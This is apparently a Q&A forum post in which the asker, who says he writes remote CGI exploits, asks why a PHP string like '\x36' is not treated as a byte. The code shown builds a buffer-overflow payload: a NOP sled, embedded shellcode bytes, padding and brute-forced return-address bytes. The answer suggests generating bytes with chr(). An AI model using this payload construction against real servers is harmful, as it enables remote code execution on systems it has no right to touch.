# \xFF string to actual byte

Tags: php, string, hex, byte

I am currently working on a lot of thing with shellcodes and remoted exploits with CGI. I need to write this in PHP.

At the moment I have the following problem, that when I create a byte in hexform ala "\xf2" it is interpreted as a string rather than a byte.

An abstract of my code:

```
    function createByte(){
    $hex = array(0,1,2,3,4,5,6,7,8,9,"a","b","c","d","e","f");
    $byte = array();
    foreach($hex as $c){
        foreach($hex as $b){
            $byte[] = "\\x" . $c.$b;
        }
    }
    return $byte;
}

$SHELLCODE =
    "\xbb\xaa\xcf\x88\x13\xd9\xc8\xd9\x74\x24\xf4\x5a
     \x31\xc9\xb1\x01\x83\xea\xfc\x31\x5a\x0e\x03\xf0
     \xc1\x6a\xe6";
echo "[+] creating the sled.\n";

$CODE = str_repeat("\x90", EVIL_SPACE_SIZE);
for ($i = 0, $j = EVIL_SPACE_SIZE - strlen($SHELLCODE) - 1 ;
     $i < strlen($SHELLCODE) ; $i++, $j++) {
    $CODE[$j] = $SHELLCODE[$i];
}
$b = array();
foreach(createByte() as $add){
    $b[] = str_repeat("A", 23).$CODE.$add.EVIL_SPACE_ADDR;
}
```

Effectively, at some point "�j��\x36���" appears. And as you can see \x36 is a string rather than the byte as the others.

How does one accomplish that \x36 becomes a correct byte? $CODE gets the correct bytes though.

All the best, 
Richard

Answer (score 1):

You probably want to do:

```
function createByte() {
    $bytes = array();
    for ($i = 0; $i < 256; $i++) $bytes[] = chr($i);
    return $bytes;
}
```

which is cleaner, more readable and computationally more efficient.